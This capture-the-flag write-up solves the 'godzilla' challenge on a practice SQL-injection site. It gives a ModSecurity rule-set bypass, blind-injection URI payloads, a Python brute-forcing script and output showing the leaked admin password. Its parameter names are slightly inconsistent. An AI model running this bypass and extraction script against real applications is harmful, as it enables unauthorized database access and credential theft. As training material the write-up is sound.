Skip to main content

godzilla

1

We are provided with the SQL query:

SELECT id FROM prob_godzilla WHERE id='{$_GET[id]}' AND pw='{$_GET[pw]}'

This challenge also utilizes the MOD Security CRS rule-sheet. This time however, we have to perform a Blind SQL injection

 

MOD Security CRS

The MOD Security Core Rule Set, is a set of regex expressions that Web Application Firewalls can use to filter traffic. In this case, out input is being filtered based on this rule set.

In order to bypass this, we can refer thisGithub issue.

2

 

Blind SQL Injection

Extracting the password length

If we provide the following URI parameter:

?id=-1'<@=1 OR id='admin' AND length(pw)=[length] OR '

The resultant query becomes:

SELECT id FROM prob_godzilla WHERE id='-1'<@=1 OR id='admin' AND length(pw)=[length] OR '' AND pw=''

If the length of pw for id='admin' is equal to the query will result into True. This will cause the Hello admin message to be printed. We can brute force the length and use the message as an indicator of correct brute force value.

Leaking the password

If we provide the following URI parameter:

-1'<@=1 OR id='admin' AND substr(pw, [index, 1)='[character]' OR '

The resultant query becomes:

SELECT id FROM prob_godzilla WHERE id='-1'<@=1 OR id='admin' AND substr(pw, [index, 1)='[character]' OR '' AND pw=''

If for id='admin', the character of the pw at [index] is the same as the [character] that we provide, the query will result into True. This will cause the Hello admin message to be printed. We can brute force the password by changing the [index] and the [character].

Script

godzilla_script.py
import requests
import urllib.parse
import string

cookies = {'PHPSESSID': 'p2aj4nltfvs8lji1sdmr3c2lam'}
url = "https://modsec.rubiya.kr/chall/godzilla_799f2ae774c76c0bfd8429b8d5692918.php"
password_length = 0

for x in range(0, 10):
  payload = f"-1'<@=1 OR id='admin' AND length(pw)={x} OR '"
  encoded_payload = urllib.parse.quote_plus(payload)
  full_url = f"{url}?pw={encoded_payload}"
    
  response = requests.get(full_url, cookies=cookies)
    
  if "Hello admin" in response.text:
    password_length = x
    break

print()    
print(f"[!] Payload: ?pw={payload}")
print(f"[!] Payload (URL encoded): ?pw={encoded_payload}")
print(f"[!] Password length: {password_length}")

password = ""
searchspace = string.digits + string.ascii_letters

for index in range(1, password_length + 1):
  for char in searchspace:
    payload = f"-1'<@=1 OR id='admin' AND substr(pw, {index}, 1)='{char}' OR '"
    encoded_payload = urllib.parse.quote_plus(payload)
    full_url = f"{url}?pw={encoded_payload}"

    response = requests.get(full_url, cookies=cookies)

    if "Hello admin" in response.text:
      password += char
      print()
      print(f"[+] Payload: ?pw={payload}")
      print(f"[+] Payload (URL encoded): ?pw={encoded_payload}")
      print(f"[+] Character at index {index}: {char}")
      break

print()
print(f"[!] Extracted password: {password}")
print(f"[!] Final payload: ?pw={password}")
$ python .\godzilla_script.py

[!] Payload: ?pw=-1'<@=1 OR id='admin' AND length(pw)=8 OR '
[!] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+length%28pw%29%3D8+OR+%27
[!] Password length: 8

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 1, 1)='a' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+1%2C+1%29%3D%27a%27+OR+%27
[+] Character at index 1: a

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 2, 1)='1' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+2%2C+1%29%3D%271%27+OR+%27
[+] Character at index 2: 1

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 3, 1)='8' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+3%2C+1%29%3D%278%27+OR+%27
[+] Character at index 3: 8

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 4, 1)='a' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+4%2C+1%29%3D%27a%27+OR+%27
[+] Character at index 4: a

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 5, 1)='6' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+5%2C+1%29%3D%276%27+OR+%27
[+] Character at index 5: 6

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 6, 1)='c' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+6%2C+1%29%3D%27c%27+OR+%27
[+] Character at index 6: c

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 7, 1)='c' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+7%2C+1%29%3D%27c%27+OR+%27
[+] Character at index 7: c

[+] Payload: ?pw=-1'<@=1 OR id='admin' AND substr(pw, 8, 1)='5' OR '
[+] Payload (URL encoded): ?pw=-1%27%3C%40%3D1+OR+id%3D%27admin%27+AND+substr%28pw%2C+8%2C+1%29%3D%275%27+OR+%27
[+] Character at index 8: 5

[!] Extracted password: a18a6cc5
[!] Final payload: ?pw=a18a6cc5

 

If we provide the following URI parameter:

?pw=a18a6cc5

The resultant query becomes:

SELECT pw FROM prob_godzilla WHERE id='admin' AND pw='a18a6cc5'

3